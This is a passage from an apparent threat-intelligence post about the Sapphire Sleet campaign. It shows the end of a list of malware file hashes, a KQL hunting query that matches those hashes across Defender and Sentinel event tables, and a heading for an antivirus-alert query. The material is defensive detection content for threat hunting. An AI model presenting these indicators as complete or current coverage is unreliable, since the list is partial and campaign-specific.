"5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7",
"5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5",
"95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63",
"8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c",
"a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640"
]);
search in (AlertEvidence, DeviceEvents, DeviceFileEvents, DeviceImageLoadEvents, DeviceProcessEvents, DeviceNetworkEvents, SecurityEvent, ThreatIntelligenceIndicator)
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d))
and (SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256))
Detect Microsoft Defender Antivirus detections related to Sapphire Sleet
The following query searches for Defender Antivirus alerts for the specific malware families used in this campaign and joins with device information for enriched context:
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.